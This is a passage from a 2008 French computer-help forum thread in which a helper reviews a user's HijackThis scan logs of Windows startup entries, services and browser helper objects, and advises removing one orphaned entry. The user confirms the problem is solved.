O23 - Service: Service de l'iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files\Common Files\Steam\SteamService.exe
O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - %ProgramFiles%\Windows Media Player\wmpnetwk.exe (file missing)
Re,
Fix les lignes dans le cadre ci-dessous avec HijackThis : AIDE EN IMAGES
O2 - BHO: (no name) - {39F63908-E12A-4A21-A7EB-67CA3B876C52} - (no file)
|
Répondre à Angeldark
C'est fait..
Logfile of HijackThis v1.99.1
Scan saved at 15:23, on 2008-09-13
Platform: Unknown Windows (WinNT 6.00.1905 SP1)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Windows\vVX3000.exe
C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\ESET\nod32kui.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\DNA\btdna.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Users\Administrateur\Desktop\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [VX3000] C:\Windows\vVX3000.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [RemoteControl8] "C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe"
O4 - HKLM\..\Run: [PDVD8LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD8\Language\Language.exe"
O4 - HKLM\..\Run: [BDRegion] C:\Program Files\Cyberlink\Shared Files\brs.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Program Files\Alcohol Soft\Alcohol 52\axcmd.exe" /automount
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [AntiFreeze] C:\Program Files\AntiFreeze\AntiFreeze.exe /splash
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\nlaapi.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\napinsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\bonjour\mdnsnsp.dll
O11 - Options group: [INTERNATIONAL] International*
O13 - Gopher Prefix:
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://webscanner.kaspersky.fr/kavwebscan_unicode.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: @%SystemRoot%\ehome\ehstart.dll,-101 (ehstart) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: Service de l'iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files\Common Files\Steam\SteamService.exe
O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - %ProgramFiles%\Windows Media Player\wmpnetwk.exe (file missing)
Tu as d'autres problèmes ?
Répondre à Angeldark
non, merci pour l'aide ^^
Bon surf 
Répondre à Angeldark
Il y a 1311 utilisateurs connus et inconnus. Pour voir la liste des connectés connus, cliquez ici.
